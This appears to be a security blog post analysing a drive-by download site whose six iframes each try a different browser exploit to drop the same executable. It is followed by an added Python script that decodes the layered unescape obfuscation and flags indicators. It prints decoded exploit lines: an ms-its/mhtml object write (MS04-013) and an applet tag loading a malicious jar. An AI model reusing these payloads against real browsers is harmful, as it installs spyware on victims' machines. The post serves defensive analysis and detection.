New methods have surfaced, and the spyware threat has just gotten “smarter”. Some sites now try several vulnerabilities at once in order to deploy a single file, banking on the hope that at least one of these methods hits a vulnerability the system has not yet patched.
Many sites have already employed this method of deploying malicious content onto a system, and here’s a view of what happens with our sample site.
Either by redirection or from some other website, the user is taken to <BLOCKED>/RC, a site which contains an ANI file exploit and 6 iframes, each using a different method of pushing a certain file onto the user’s system. Depending on the security employed by the system and the patches that are in place, the user’s PC may execute one, two or all of the contents of the 6 iframes.
IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm
- The code is escaped three times before the malicious code is revealed, and even then it is padded with garbage code in order to confuse the scanner.
- Then the file downloaded from <BLOCKED>/RC/web.exe is dropped and launched on the system.
FINAL CODE:
IFRAME 2:
- Same as IFRAME 1.
IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm
- This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
- Then a CHM file is launched. This CHM file drops and launches web.exe by exploiting the MS04-013 vulnerability; web.exe is the same file launched by the earlier IFRAME.
FINAL CODE:
document.write('<object data="ms-its:mhtml:file://c: c.mht!'+PATH+'::/logo.php" type="text/x-scriptlet"></object>');
IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm
- Escaped three times, and the final code again contains garbage code to confuse the scanner.
- Then the final code launches web.exe using a vulnerability.
FINAL CODE:
IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm
- The code in this part is not obfuscated.
- It opens <BLOCKED>/RC/exp_sp60/int.htm, which in turn executes <BLOCKED>/RC/exp_sp60/final/int.hta.
- The end result is similar to that of the earlier IFRAMEs.
IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm
- The code is again escaped three times before the final code is revealed.
- The final code executes both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar.
document.write("<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>");
document.write("<PARAM NAME='url' VALUE='"+PATH+"'>");
document.write("");
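As an added example (not code from the original post), here is a small Python triage script that peels the repeated unescape() wrapping described for these iframes and then flags the indicators this post lists: ms-its/mhtml objects, applets loading a class from a jar, .hta and .exe references, and a landing page stuffed with zero-size iframes. The sample inputs are constructed; example.invalid and PLACEHOLDER stand in for the blocked URLs.

```python
import re
from urllib.parse import quote, unquote

# Indicators the post describes in the decoded iframe contents.
INDICATORS = {
    "ms-its/mhtml object (MS04-013 style)": re.compile(r"ms-its:|mhtml:", re.I),
    "applet loading a class from a jar": re.compile(r"<applet\b[^>]*archive\s*=", re.I),
    "HTA referenced": re.compile(r"\.hta\b", re.I),
    "executable referenced": re.compile(r"\b\w+\.exe\b", re.I),
}
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)

def js_unescape(s):
    """Decode like JavaScript unescape(): %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)

def peel_unescape_layers(script, max_layers=10):
    """Replace every unescape('...') call with its decoded text and repeat
    until nothing changes. Returns (decoded_text, layers_removed)."""
    layers = 0
    while layers < max_layers:
        decoded = UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), script)
        if decoded == script:
            break
        script, layers = decoded, layers + 1
    return script, layers

def scan_page(html):
    """Peel the escape layers, then report iframe count and matched indicators."""
    decoded, layers = peel_unescape_layers(html)
    iframes = len(re.findall(r"<iframe\b", decoded, re.I))
    hits = [name for name, pat in INDICATORS.items() if pat.search(decoded)]
    return {"layers": layers, "iframes": iframes, "indicators": hits}

# Constructed samples (not captured from the real site): a landing page with six
# zero-size iframes, and an iframe body escaped three times around an ms-its object.
SAMPLE_LANDING = "".join(
    f"<iframe src='http://example.invalid/RC/exp_{i}/index.htm' width=0 height=0></iframe>"
    for i in range(1, 7))

def wrap_in_unescape(js, times):
    for _ in range(times):
        js = "document.write(unescape('" + quote(js, safe="") + "'))"
    return js

SAMPLE_IFRAME = wrap_in_unescape(
    "<object data='ms-its:mhtml:file://PLACEHOLDER::/logo.php' "
    "type='text/x-scriptlet'></object>", 3)
```

Running scan_page() over a captured page gives the number of escape layers it had to peel, which on its own is a useful hint that a page is hiding something, even before any indicator matches.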
Sites that peddle spyware and their cohorts (downloaders and droppers) will employ every possible technique just to push them onto the user’s system. Against aggressive methods such as this, we need to be vigilant in applying the latest patches to secure our systems.